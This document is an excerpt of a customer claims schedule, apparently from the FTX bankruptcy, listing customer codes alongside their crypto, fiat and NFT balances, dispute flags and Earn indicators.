| 07354368 | | DOGE[173.67201692], USD[0.00] | | |
| 07354369 | | ETH[0], ETHW[0], SOL[0], USD[0.00], USDT[0] | | |
| 07354370 | | TRX[103.86576969], USD[0.00] | | |
| 07354371 | | DOGE[.32863695], TRX[1], USD[1.35] | | |
| 07354372 | | BTC[.00044919], CUSDT[4], DOGE[749.43205072], ETH[.00951546], ETHW[.00951546], SHIB[428724.54448017], USD[0.00] | | |
| 07354373 | | USD[0.00] | | |
| 07354374 | | CUSDT[2], TRX[1], USD[0.01] | | |
| 07354375 | | DOGE[1], USD[0.00] | | |
| 07354376 | | SHIB[673933.29892891], USD[0.00] | | |
| 07354377 | | DOGE[84570.65211271], USD[0.01], USDT[0] | Yes | |
| 07354378 | | ETH[.03614141], ETHW[.03614141], TRX[4184.58431057], USD[0.00] | | |
| 07354379 | | BRZ[0], BTC[0], DOGE[0], USD[0.02] | | |
| 07354380 | | USD[10.00] | | |
| 07354381 | | USD[10.00] | | |
| 07354382 | | USD[0.00] | | |
| 07354383 | | CUSDT[5], USD[0.00], USDT[0] | Yes | |
| 07354384 | | CUSDT[1], DOGE[135.04264916], USD[0.00] | | |
| 07354385 | | USD[0.06] | | |
| 07354386 | | USD[10.00] | | |
| 07354387 | | DOGE[1.96623477], USD[0.00] | | |
| 07354388 | | CUSDT[3], DOGE[3259.28038583], USD[0.00] | | |
| 07354390 | | TRX[1], USD[0.01] | | |
| 07354391 | | USD[10.00] | | |
| 07354393 | | USD[10.00] | | |
| 07354394 | | USD[10.00] | | |
| 07354396 | | DOGE[1], USD[0.01] | | |
| 07354397 | | UNI[.00479275], USD[0.49] | Yes | |
| 07354398 | | CUSDT[1], USD[0.00] | | |
| 07354399 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07354400 | | USD[10.00] | | |
| 07354401 | | USD[0.01] | | |
| 07354402 | | USD[10.00] | | |
| 07354403 | | USD[10.00] | | |
| 07354404 | | CUSDT[102.09394195], TRX[1], USD[0.00] | Yes | |
| 07354405 | | USD[10.00] | | |
| 07354406 | | BRZ[5], BTC[0], CUSDT[14], DOGE[0], ETH[0], GRT[1], SOL[0], TRX[12], UNI[0], USD[0.00], USDT[1] | | |
| 07354407 | | CUSDT[1], DOGE[1.00253968], USD[0.01] | | |
| 07354408 | | AVAX[.01205343], CUSDT[1], DOGE[136.63555954], GRT[1.54331379], LINK[.50541572], SHIB[178714.04350308], TRX[23.01874337], USD[0.01] | | |
| 07354409 | | CUSDT[5], DOGE[13557.44121861], TRX[201.96926673], USD[0.00] | | |
| 07354410 | | USD[10.00] | | |
| 07354411 | | USD[10.00] | | |
| 07354412 | | USD[0.00] | | |
| 07354413 | | USD[10.00] | | |
| 07354414 | | USD[10.00] | | |
| 07354415 | | BTC[0], DOGE[1], GRT[1], USD[0.00] | | |
| 07354416 | | DOGE[1.0006568], USD[0.00] | | |
| 07354417 | | CUSDT[1], DOGE[1], UNI[0], USD[0.01] | | |
| 07354419 | | BTC[.00121265], CUSDT[13], SHIB[204596.53994614], SOL[.32048889], TRX[169.625003], USD[8.72] | Yes | |
| 07354420 | | DOGE[.696], ETH[.00000001], SUSHI[.434], TRX[.296], USD[0.44] | | |
| 07354421 | | DOGE[1.00006731], ETH[.00182178], ETHW[.00182178], USD[0.01] | | |
| 07354422 | | USD[0.01] | | |
| 07354423 | | BAT[1], CUSDT[10], ETH[0], TRX[3], USD[0.01] | | |
| 07354424 | | CUSDT[2], ETH[.00662539], ETHW[.00662539], GRT[.00079288], USD[0.01] | | |
| 07354425 | | USD[10.00] | | |
| 07354427 | | BTC[0], CUSDT[1], USD[10.00] | | |
| 07354428 | | BRZ[1], CUSDT[1], DOGE[1783.09182026], GRT[1], TRX[4864.54754634], USD[0.00] | | |
| 07354429 | | USD[10.00] | | |
| 07354430 | | CUSDT[1], DOGE[54.7062651], USD[0.00] | | |
| 07354431 | Contingent, Disputed | USD[10.00] | | |
| 07354432 | | AAVE[.0794203], BRZ[102.79567385], CUSDT[9], DOGE[.00137472], ETHW[.05991966], SHIB[1], TRX[1], USD[3.31], YFI[.00042941] | Yes | |
| 07354433 | | GRT[4.27024452], USD[0.00] | | |
| 07354434 | | USD[10.00] | | |
| 07354435 | | USD[10.00] | | |
| 07354436 | | ETH[.0054537], ETHW[.0054537], USD[0.00] | | |
| 07354437 | | USD[10.00] | | |
| 07354438 | | BRZ[1], DOGE[1], USD[436.26] | | |
| 07354439 | | DOGE[1], TRX[3], USD[0.00] | | |
| 07354440 | | USD[0.00] | | |
| 07354441 | | USD[0.02], USDT[0] | | |
| 07354442 | | USD[0.01] | | |
| 07354443 | | BRZ[0], DOGE[1], ETH[.00602341], ETHW[.00602341], USD[0.00] | | |
| 07354444 | | ETH[.00420948], ETHW[.00420948], USD[0.00] | | |
| 07354445 | | USD[10.00] | | |
| 07354446 | | CUSDT[1], USD[0.01] | | |
| 07354447 | | USD[10.00] | | |
| 07354448 | | USD[10.00] | | |
| 07354449 | | BTC[.01918488], CUSDT[2], DOGE[11732.95516788], TRX[1], USD[0.00] | Yes | |
| 07354450 | | CUSDT[1], DOGE[.73910542], USD[16.01] | | |
| 07354451 | | DOGE[53.22519393], USD[13.00] | | |
| 07354452 | | CUSDT[1], DOGE[0], TRX[1], USD[0.01] | | |
| 07354453 | | BAT[2], BRZ[7.00061624], BTC[0], CUSDT[28], DOGE[0], ETH[0], ETHW[0], GRT[1], LTC[0], USD[0.17], USDT[2] | | |
| 07354454 | | CUSDT[3], DOGE[.10490122], ETH[.00003108], ETHW[.00003108], GRT[2], TRX[1], USD[0.53], USDT[1] | | |
| 07354455 | | CUSDT[6], DOGE[.00921946], USD[0.00] | | |
| 07354456 | | USD[0.00] | | |
| 07354457 | | USD[10.00] | | |
| 07354459 | | BAT[1.01576669], CUSDT[1], DOGE[3.01048549], USD[0.00] | Yes | |
| 07354460 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07354461 | | USD[10.00] | | |
| 07354462 | | BTC[.00018335], USD[0.00] | | |
| 07354463 | | DOGE[.35126458], ETH[.00072742], ETHW[.00072742], USD[0.00] | | |
| 07354464 | | CUSDT[1], DOGE[13.86306796], USD[0.00] | | |
| 07354465 | | GRT[1.00313735], USD[0.00], USDT[0] | Yes | |
| 07354466 | | USD[10.00] | | |
| 07354467 | | USD[10.00] | | |
| 07354469 | | DOGE[1], USD[0.01] | | |
| 07354470 | | BAT[1.01644381], BRZ[2], BTC[-0.04], CUSDT[1], DOGE[10565.78139091], GRT[1.00512355], LINK[3.30968077], SOL[1.06609911], TRX[6], USD[210.93] | Yes | |
| 07354471 | | USD[10.00] | | |
| 07354472 | | USD[10.00] | | |
| 07354475 | | USD[10.00] | | |
| 07354477 | | BTC[0], USD[0.00] | Yes | |
| 07354480 | | BRZ[2], BTC[0], CUSDT[2], DOGE[1], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07354481 | | USD[0.00] | | |
| 07354482 | | USD[10.00] | | |
| 07354483 | | CUSDT[3], DOGE[.84639757], SHIB[1], TRX[1.03380571], USD[0.00] | | |
| 07354484 | | BRZ[1], CUSDT[2], DOGE[0], ETH[0], LINK[0], TRX[0], UNI[0], USD[0.07], YFI[0] | | |
| 07354486 | | EUR[0.50], SHIB[5], USD[0.00], YFI[.00000035] | Yes | |
| 07354487 | | BTC[0], CUSDT[1], DOGE[3.57168215], LTC[.00007964], TRX[1], USD[0.01] | | |
| 07354488 | | USD[10.00] | | |
| 07354489 | | BAT[1], CUSDT[6], DOGE[458.84817478], TRX[1], USD[0.00] | | |
| 07354490 | | LTC[.00351222], USD[23.50], USDT[15.538217] | | |
| 07354491 | | USD[0.13] | | |
| 07354492 | | USD[10.00] | | |
| 07354493 | | CUSDT[1], USD[0.07] | | |
| 07354494 | | CUSDT[4], USD[0.00] | Yes | |
| 07354498 | | BAT[0], BCH[0], BTC[0], CUSDT[1], DOGE[2], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], TRX[7], UNI[0], USD[0.00], USDT[0.00000077], YFI[0] | | |
| 07354499 | | USD[10.00] | | |
| 07354500 | | CUSDT[5], DOGE[1], GRT[1.00180073], SHIB[11448743.36639863], USD[0.00] | Yes | |
| 07354503 | | USD[20.63] | | |
| 07354505 | | BRZ[1], CUSDT[2], DOGE[2210.82523645], ETH[.00006135], ETHW[.00006135], LINK[1.09790732], SUSHI[1.09751638], TRX[1], USD[84.83] | Yes | |
| 07354506 | | CUSDT[1], TRX[2], USD[0.00] | Yes | |
| 07354507 | | LINK[.35796083], USD[0.00] | | |
| 07354508 | | DOGE[0.00071973], TRX[0], USD[0.00] | | |
| 07354509 | | DOGE[17093.37626591], TRX[1], USD[0.00], USDT[1] | | |
| 07354510 | | USD[10.00] | | |
| 07354512 | | USD[10.00] | | |
| 07354513 | | USD[10.00] | | |
| 07354516 | | USD[10.00] | | |
| 07354518 | | USD[10.00] | | |
| 07354519 | | BCH[.05411804], CUSDT[1], DOGE[401.18195082], ETH[.01497999], ETHW[.01497999], USD[102.90] | | |
| 07354520 | | USD[10.00] | | |
| 07354521 | | CUSDT[5], DOGE[1], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07354525 | | USD[10.00] | | |
| 07354526 | | USD[10.00] | | |
| 07354527 | | BRZ[1], DOGE[14196.58440817], USD[11.02] | Yes | |
| 07354528 | | USD[0.00] | | |
| 07354529 | | USD[10.00] | | |
| 07354530 | | USD[10.00] | | |
| 07354531 | | USD[10.00] | | |
| 07354532 | | AVAX[8.52793252], BAT[1.01644237], BRZ[3], CUSDT[5193.3345012], DOGE[25263.57681831], GRT[1.00481438], LINK[18.47956453], NFT [427490277258780502/Entrance Voucher #2686][1], SHIB[1], SOL[11.27035041], SUSHI[56.29697851], TRX[17544.47776558], UNI[5.58851883], USD[0.00], YFI[.00835526] | Yes | |
| 07354533 | | BTC[.01002971], CUSDT[2], DOGE[2397.25589808], ETH[.18403583], ETHW[.18403583], USD[10.00] | | |
| 07354534 | | USD[10.00] | | |
| 07354535 | | BRZ[0], BTC[0], DOGE[1], ETH[0], TRX[2], USD[0.01], USDT[1.00000001] | | |
| 07354538 | | USD[10.00] | | |
| 07354539 | | USD[10.00] | | |
| 07354540 | | DOGE[1.00001056], TRX[1], USD[44.42] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07354542 | | USD[10.00] | | |
| 07354543 | | BRZ[3], CUSDT[12], DOGE[6.01001212], GRT[.00088083], KSHIB[3055.08063803], SHIB[2], TRX[6], UNI[.0000514], USD[0.00], USDT[0] | Yes | |
| 07354544 | | CUSDT[1], DOGE[0], ETH[0], SOL[1.31818543], USD[0.27] | | |
| 07354548 | | DOGE[186.2139136], USD[0.00] | | |
| 07354550 | | USD[10.00] | | |
| 07354553 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07354555 | | CUSDT[1], TRX[2], USD[5.06] | | |
| 07354556 | | CUSDT[2.89682541], USD[0.00] | | |
| 07354557 | | DOGE[1], USD[0.00] | | |
| 07354559 | | BTC[0], CUSDT[4], DOGE[0], TRX[2], USD[0.00], USDT[1] | | |
| 07354561 | | DOGE[1.97841734], ETH[.00048949], ETHW[.00048949], USD[0.00] | | |
| 07354562 | Contingent, Disputed | BRZ[0.00000001], GRT[0], USD[0.01] | | |
| 07354563 | | USD[10.00] | | |
| 07354566 | | DOGE[.00134665], ETHW[1.28420916], LTC[.0000053], TRX[1], USD[0.00] | Yes | |
| 07354567 | | USD[10.00] | | |
| 07354568 | | USD[10.00] | | |
| 07354570 | | USD[10.00] | | |
| 07354571 | | CUSDT[1], DOGE[1], SOL[.92641449], USD[0.00] | | |
| 07354572 | | USD[10.00] | | |
| 07354573 | | DOGE[.00037677], TRX[1], USD[6303.03] | | |
| 07354577 | | BRZ[1], DOGE[1], USD[0.01] | | |
| 07354578 | | USD[11.02] | Yes | |
| 07354579 | | USD[8.70] | | |
| 07354580 | | CUSDT[1], DOGE[1896.83140399], USD[0.00] | | |
| 07354581 | | USD[10.00] | | |
| 07354582 | | USD[10.00] | | |
| 07354583 | | DOGE[1], USD[0.01] | | |
| 07354584 | | BRZ[0], CUSDT[1], DOGE[153.41497833], ETH[0], USD[0.00], USDT[0] | | |
| 07354585 | | BRZ[0.00000005], GRT[0], USD[0.00], USDT[0] | | |
| 07354586 | | BTC[.00017761], SOL[.00776166], USD[0.01] | | |
| 07354587 | | CUSDT[4], DOGE[.00002799], ETH[.00003053], ETHW[.00003053], USD[0.06] | | |
| 07354588 | | USD[10.00] | | |
| 07354589 | | USD[10.00] | | |
| 07354592 | | USD[10.00] | | |
| 07354594 | | BTC[.00000009], DOGE[0], ETH[0], ETHW[0], LTC[0], MATIC[0], SOL[0], UNI[0], USD[50.36], USDT[0.00000001] | Yes | |
| 07354595 | | USD[10.00] | | |
| 07354596 | | USD[10.00] | | |
| 07354598 | | USD[10.00] | | |
| 07354599 | | DOGE[121.47246984], USD[0.00] | | |
| 07354600 | | USD[10.00] | | |
| 07354601 | | ETH[.00041354], ETHW[4.71439823], SUSHI[.486], USD[0.00], USDT[1.14776628] | | |
| 07354602 | | USD[0.01] | | |
| 07354603 | | USD[10.00] | | |
| 07354604 | | DOGE[1433.94722022], USD[0.00] | Yes | |
| 07354605 | | USD[1.60], USDT[0] | | |
| 07354606 | | CUSDT[2], TRX[1], USD[0.00] | Yes | |
| 07354607 | | USD[10.00] | | |
| 07354608 | | USD[10.00] | | |
| 07354609 | | USD[10.00] | | |
| 07354610 | | USD[10.00] | | |
| 07354611 | | CUSDT[2], DOGE[13675.04765607], ETH[.0677118], ETHW[.06687137], SOL[2.08590269], TRX[71.08081738], USD[0.00] | Yes | |
| 07354613 | | BRZ[1], CUSDT[3], DOGE[6519.22824620], TRX[3091.93714389], USD[10.00] | | |
| 07354614 | | BRZ[1], USD[0.00] | | |
| 07354616 | | USD[10.00] | | |
| 07354617 | | BTC[.01769247], CUSDT[8], DOGE[12919.38448884], ETH[.22270494], ETHW[.22270494], TRX[3], USD[0.00] | | |
| 07354618 | | DOGE[24207.34712767], USD[0.00], USDT[0] | Yes | |
| 07354619 | | CUSDT[1], USD[0.00] | | |
| 07354620 | | DOGE[149.08299793], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07354621 | | CUSDT[3], DOGE[4485.53691443], TRX[1], USD[0.18] | | |
| 07354622 | | BRZ[1], CUSDT[7], DOGE[2], SHIB[4387211.43912093], TRX[6], USD[0.00], USDT[1] | | |
| 07354623 | | DOGE[625.50953853], ETH[.00428336], ETHW[.00428336], USD[0.00] | | |
| 07354624 | | USD[10.00] | | |
| 07354625 | | USD[10.00] | | |
| 07354626 | | USD[10.00] | | |
| 07354627 | | CUSDT[1136.45073729], DOGE[566.00695888], TRX[341.97615312], USD[0.00] | Yes | |
| 07354628 | | USD[10.00] | | |
| 07354629 | | USD[10.00] | | |
| 07354631 | | DOGE[1.83420288], USD[0.00] | | |
| 07354633 | | DOGE[0], USD[0.00] | | |
| 07354634 | | USD[10.00] | | |
| 07354637 | | AUD[0.00], BAT[0], BCH[0], BRZ[2], BTC[0], CAD[0.00], CUSDT[18], DOGE[0], ETH[0], EUR[0.00], GRT[0], LINK[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07354638 | | DOGE[508.99895149], ETH[.00564933], ETHW[.00564933], USD[0.00] | | |
| 07354639 | | BRZ[1], CUSDT[3], TRX[122210.45831903], USD[0.00] | Yes | |
| 07354640 | | USD[10.00] | | |
| 07354641 | | TRX[1], USD[0.00], USDT[0] | | |
| 07354642 | | SHIB[1], USD[0.00] | | |
| 07354643 | | USD[10.00] | | |
| 07354644 | | USD[10.00] | | |
| 07354645 | | USD[10.00] | | |
| 07354647 | | BTC[.0038309], CUSDT[546.02377171], DOGE[20921.22724513], ETH[.16377001], ETHW[.16333448], KSHIB[206.51697352], SOL[6.91684412], TRX[384.72352765], USD[0.00] | Yes | |
| 07354648 | | LTC[0], NFT [47306289663461856B/FTX - Off The Grid Miami #1113][1], NFT [493589300668327515/Humpty Dumpty #232][1], SHIB[1650.67006598], USD[0.01] | Yes | |
| 07354649 | | CUSDT[1], USD[0.00] | | |
| 07354650 | | USD[10.00] | | |
| 07354651 | | DOGE[3056.30617647], TRX[185.04465365], USD[0.00] | | |
| 07354652 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07354653 | | SHIB[311720.69825436], USD[0.00] | | |
| 07354654 | | USD[10.00] | | |
| 07354655 | | USD[20.00] | | |
| 07354656 | | USD[10.00] | | |
| 07354657 | | USD[10.00] | | |
| 07354658 | | CUSDT[3], GRT[1], TRX[4], USD[0.01], USDT[2] | | |
| 07354659 | | BRZ[1], CUSDT[6], DOGE[1.00087601], TRX[2], USD[0.01] | | |
| 07354660 | | BCH[.03592715], BTC[.000984], CUSDT[2], DOGE[4.01658216], SOL[1.07514624], USD[0.00], USDT[.00000124] | Yes | |
| 07354661 | | DOGE[22.67722406], USD[0.00] | Yes | |
| 07354662 | | DOGE[0], NFT [355428911393890612/Barcelona Ticket Stub #400][1], NFT [360775067148669477/Barcelona Ticket Stub #1309][1], SOL[0], USD[0.00] | Yes | |
| 07354663 | | DOGE[0], ETH[0], TRX[2], USD[0.00] | | |
| 07354664 | | CUSDT[2], DOGE[4], TRX[3], USD[0.01] | | |
| 07354665 | | USD[10.00] | | |
| 07354666 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07354667 | | USD[10.00] | | |
| 07354668 | | USD[10.00] | | |
| 07354669 | | USD[10.00] | | |
| 07354670 | | USD[10.00] | | |
| 07354671 | | USD[0.09] | | |
| 07354672 | | USD[10.00] | | |
| 07354676 | | CUSDT[10], TRX[3], USD[0.00] | | |
| 07354677 | | USD[10.00] | | |
| 07354678 | | TRX[1], USD[0.00], USDT[1] | | |
| 07354680 | | USD[10.00] | | |
| 07354681 | | DOGE[0.97049062], LINK[.4981], SUSHI[.99905], UNI[.99905], USD[12.42] | | |
| 07354682 | | CUSDT[2], TRX[1.00009334], USD[0.00] | Yes | |
| 07354683 | | USD[50.17] | | |
| 07354685 | | CUSDT[1], DOGE[89.77540236], USD[0.11] | | |
| 07354686 | | BCH[0], BTC[0], CUSDT[5], DAI[.00000001], DOGE[0], ETH[0.00000001], ETHW[0], TRX[3], USD[0.00] | | |
| 07354687 | | BTC[.00016805], CUSDT[1], SHIB[1], USD[0.00] | Yes | |
| 07354688 | | BAT[2], CUSDT[1], GRT[1], SHIB[1], TRX[1], USD[0.00], USDT[1] | | |

| Customer Code | Contingent, or Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07354689 | | USD[10.00] | | |
| 07354690 | | USD[10.00] | | |
| 07354691 | | USD[10.00] | | |
| 07354692 | | USD[10.00] | | |
| 07354693 | | CUSDT[7], DOGE[3], GRT[1], SOL[60.71779095], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07354694 | | USD[10.00] | | |
| 07354695 | | DOGE[185.38426877], GRT[9.47731191], TRX[1.0238089], USD[0.00] | Yes | |
| 07354696 | | DOGE[3.25442774], USD[0.00] | | |
| 07354697 | | CUSDT[1], DOGE[0.00196551], SHIB[1], USD[21.77] | Yes | |
| 07354698 | | BAT[1.0165555], BRZ[1], CUSDT[17], DOGE[899.97319045], ETH[.03108139], ETHW[.03069835], GRT[132.73693385], MKR[.06279485], SHIB[1398100.2113986], SOL[1.64945255], TRX[8.36916671], USD[0.00] | Yes | |
| 07354699 | | BRZ[1], CUSDT[5], DOGE[337.0138358], USD[0.49], USDT[0.02570992] | | |
| 07354701 | | DOGE[43.53017723], USD[0.00] | | |
| 07354702 | | USD[10.00] | | |
| 07354703 | | BRZ[1], CUSDT[19], DOGE[7955.6704089], NFT (496411823409574652/Entrance Voucher #3940)[1], SHIB[7001346.03268905], SOL[4.63984323], TRX[634.84400807], USD[131.39] | Yes | |
| 07354704 | | DOGE[13.81374109], USD[93.30] | | |
| 07354705 | | USD[10.00] | | |
| 07354706 | | TRX[1], USD[0.00] | | |
| 07354708 | | USD[10.00] | | |
| 07354710 | | USD[10.00] | | |
| 07354711 | | USD[0.00] | | |
| 07354712 | | USD[10.00] | | |
| 07354713 | | USD[10.00] | | |
| 07354714 | | USD[10.00] | | |
| 07354715 | | USD[10.00] | | |
| 07354716 | | USD[10.00] | | |
| 07354717 | | USD[0.01] | | |
| 07354719 | | USD[10.00] | | |
| 07354720 | | CUSDT[1], DOGE[4.89395968], USD[0.00] | | |
| 07354721 | | BRZ[9.94737814], CUSDT[33], GRT[1.00498957], TRX[13.24859752], USD[0.01], USDT[0] | Yes | |
| 07354722 | | USD[10.00] | | |
| 07354723 | | USD[10.00] | | |
| 07354724 | | USD[10.00] | | |
| 07354725 | | BRZ[3], CUSDT[20], TRX[14.687586], USD[0.00] | | |
| 07354726 | | CUSDT[3], TRX[3], USD[0.01] | | |
| 07354727 | | CUSDT[2], DOGE[20417.80834853], GRT[1], TRX[1], USD[0.26], USDT[1] | | |
| 07354728 | | LINK[0], SUSHI[0], UNI[0], USD[6975.56], USDT[1] | | |
| 07354729 | | BRZ[0], USD[0.00] | | |
| 07354730 | | USD[0.01] | | |
| 07354731 | | USD[0.01] | | |
| 07354732 | | USD[0.18] | | |
| 07354733 | | USD[10.00] | | |
| 07354735 | | CUSDT[12], DOGE[131.15854533], KSHIB[1065.6968295], SHIB[1315904.80915263], TRX[1], USD[0.00] | Yes | |
| 07354736 | | BTC[0], USD[81.58] | Yes | |
| 07354737 | | USD[10.00] | | |
| 07354738 | | CUSDT[4], DOGE[.00067704], GRT[.30727117], LINK[.00019921], TRX[.00008522], USD[0.08], USDT[0.00017231] | | |
| 07354739 | | CUSDT[1], DOGE[12769.96047881], USD[0.00] | | |
| 07354740 | | BRZ[1], TRX[1], USD[0.00] | Yes | |
| 07354742 | | BRZ[0], BTC[0], DOGE[0], USD[0.00] | | |
| 07354744 | | BRZ[1], CUSDT[2], DOGE[35897.21827299], TRX[2], USD[0.00] | Yes | |
| 07354746 | | DOGE[33.93662586], USD[0.00] | | |
| 07354747 | | TRX[1.17789944], USD[0.00] | | |
| 07354748 | | CUSDT[14], DOGE[1], ETH[.00000588], ETHW[.00000588], USD[0.00] | Yes | |
| 07354749 | | BF_POINT[100], BRZ[7.52505912], BTC[0], CUSDT[20], DOGE[6.07411863], GRT[2.66740374], LINK[.15352508], LTC[.066804], SOL[0.00334004], TRX[2.19547339], USD[0.03], USDT[5.36755321] | Yes | |
| 07354750 | | BRZ[2], CUSDT[532.9919529], KSHIB[1228.13656434], SHIB[1347396.61725552], SOL[.08772474], TRX[1], USD[0.01] | Yes | |
| 07354751 | | BRZ[1], DOGE[4899.5993189], USD[0.01] | | |
| 07354752 | | BRZ[4], CUSDT[2], DOGE[1066.7254652], GRT[1.00019173], SHIB[4560050.10577181], TRX[2], USD[0.01] | Yes | |
| 07354753 | | CUSDT[10], DOGE[1], ETH[.06411382], ETHW[.06331885], SHIB[2], TRX[2], USD[0.00] | Yes | |
| 07354754 | | CUSDT[11.42706492], TRX[458.76469958], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07354755 | | USD[10.00] | | |
| 07354756 | | USD[10.00] | | |
| 07354757 | | CUSDT[3], DOGE[0], SOL[0], SUSHI[0], TRX[1], USD[0.00] | | |
| 07354758 | | USD[0.00] | | |
| 07354759 | | USD[10.00] | | |
| 07354761 | | USD[289.98] | Yes | |
| 07354762 | | USD[11.00] | Yes | |
| 07354763 | | USD[10.00] | | |
| 07354764 | | USD[10.00] | | |
| 07354767 | | USD[10.00] | | |
| 07354768 | | BRZ[.000478], CUSDT[2], ETH[0], ETHW[0], SUSHI[0.66867810], TRX[0.00002683], USD[0.00] | | |
| 07354769 | | TRX[2], USD[0.01] | | |
| 07354770 | | CUSDT[4], DOGE[677.13770364], ETH[.03274233], ETHW[.03274233], TRX[3006.23722799], USD[0.00] | | |
| 07354771 | | USD[10.00] | | |
| 07354772 | | ETH[0], USD[0.00] | | |
| 07354774 | | USD[10.00] | | |
| 07354775 | | CUSDT[1028.18391828], DOGE[197.31361155], TRX[865.20893991], USD[0.00] | Yes | |
| 07354777 | | CUSDT[2], DOGE[2], USD[0.01] | | |
| 07354778 | | USD[10.00] | | |
| 07354779 | | USD[10.00] | | |
| 07354780 | | USD[10.00] | | |
| 07354782 | | CUSDT[3], DOGE[72.82894768], GRT[1.00498957], TRX[3], USD[0.00] | Yes | |
| 07354783 | | BAT[1.0165555], BRZ[2], CUSDT[1], DOGE[1.06674969], USD[0.00] | Yes | |
| 07354784 | | BCH[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], LINK[0], TRX[0], USD[0.00], USDT[0] | | |
| 07354785 | | USD[0.00] | | |
| 07354786 | | CUSDT[1], DOGE[3], ETH[0], ETHW[0], TRX[0.00003468], USD[0.01] | | |
| 07354787 | | DOGE[511.50660889], USD[10.00] | | |
| 07354788 | | BRZ[3], BTC[.00000012], CUSDT[57.58227427], DAI[222.81927402], DOGE[6], ETH[.04304658], ETHW[.04251306], GRT[2], LINK[17.75447445], MATIC[111.90452931], SHIB[7], SOL[16.140113], SUSHI[69.55161216], TRX[98.63133938], UNI[9.90047605], USD[827.98] | Yes | |
| 07354789 | | AAVE[0], AUD[0.00], AVAX[0], BAT[0], BCH[0.00000044], BTC[0], CUSDT[0], DOGE[0], ETH[0], GRT[0], KSHIB[0], LINK[0], LTC[0], MATIC[0], MKR[0], NEAR[0.00000444], PAXG[0], SHIB[0], SOL[0.00000309], SUSHI[0], TRX[0.00108542], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07354790 | | BRZ[2], CUSDT[10], TRX[1], USD[0.00] | | |
| 07354791 | | BTC[0], DOGE[0], SOL[0], USD[0.00] | | |
| 07354792 | | USD[10.00] | | |
| 07354793 | | DOGE[480.0250788], ETH[.00000478], ETHW[.00000478], TRX[.0632541], USD[0.04] | | |
| 07354795 | | BRZ[1], DOGE[6941.85911406], USD[0.00] | | |
| 07354796 | | BTC[.00017987], DOGE[1], USD[0.00], USDT[0] | | |
| 07354797 | | USD[10.00] | | |
| 07354798 | | BAT[1], BRZ[6.22634292], CUSDT[39], DOGE[21.54582848], ETH[.08659420], ETHW[0.05920339], NFT (543957707859020023/FTX - Off The Grid Miami #187)[1], SHIB[42], TRX[15.00025571], USD[0.00] | Yes | |
| 07354799 | | USD[10.00] | | |
| 07354800 | | USD[0.00] | Yes | |
| 07354801 | | BTC[.00032081], CUSDT[3], DOGE[213.4512819], GRT[7.05324446], SUSHI[.50731869], USD[5.01] | | |
| 07354802 | | CUSDT[2], LINK[.61595586], TRX[2], USD[0.01] | Yes | |
| 07354803 | | CUSDT[7], DOGE[.0000457], USD[127.31] | | |
| 07354805 | | BRZ[0.00005003], BTC[.00029451], DOGE[207.08620887], ETH[.01323778], ETHW[.01323778], USD[0.01] | | |
| 07354806 | | USD[10.00] | | |
| 07354807 | | BRZ[1], CUSDT[3], USD[0.00] | | |
| 07354808 | | DOGE[21.48333398], USD[0.00] | | |
| 07354809 | | CUSDT[10], DOGE[1], TRX[1], USD[0.00] | | |
| 07354811 | | USD[10.00] | | |
| 07354812 | | BAT[28.90082656], BTC[.00224627], CUSDT[1], DOGE[2066.94563164], ETH[.03652376], ETHW[.03652376], SOL[.52421017], SUSHI[1.39462575], TRX[24.78991693], USD[0.00] | | |
| 07354814 | | USD[10.00] | | |
| 07354815 | | USD[10.00] | | |
| 07354817 | | USD[10.00] | | |
| 07354818 | | USD[7.49] | | |
| 07354819 | | BRZ[1], USD[0.01] | | |
| 07354821 | | USD[10.00] | | |
| 07354823 | | ETH[.00000001], LINK[0], USD[67.77] | | |
| 07354824 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07354825 | | CUSDT[2], DOGE[.89123338], USD[12.85] | | |
| 07354826 | | USD[0.00] | | |
| 07354827 | | DOGE[1], GRT[0], UNI[0], USD[0.00], USDT[0.00000015] | | |
| 07354830 | | BRZ[1], CUSDT[2], DOGE[.00478226], TRX[1], USD[0.19], USDT[0] | | |
| 07354831 | | USD[10.00] | | |
| 07354832 | | CUSDT[1], DOGE[2], USD[0.24] | | |
| 07354833 | | DOGE[1], USD[0.00], USDT[1] | | |
| 07354834 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07354835 | | BF_POINT[100] | | |
| 07354836 | | USD[10.00] | | |
| 07354837 | | USD[0.01] | | |
| 07354838 | | USD[0.00] | | |
| 07354839 | | USD[0.00], USDT[0.00000001] | Yes | |
| 07354840 | | DOGE[134.2047156], USD[0.00] | | |
| 07354841 | | CUSDT[3], TRX[2], USD[0.01] | | |
| 07354842 | | BRZ[0], DOGE[1.43455336], USD[0.00], USDT[0] | Yes | |
| 07354843 | | USD[10.00] | | |
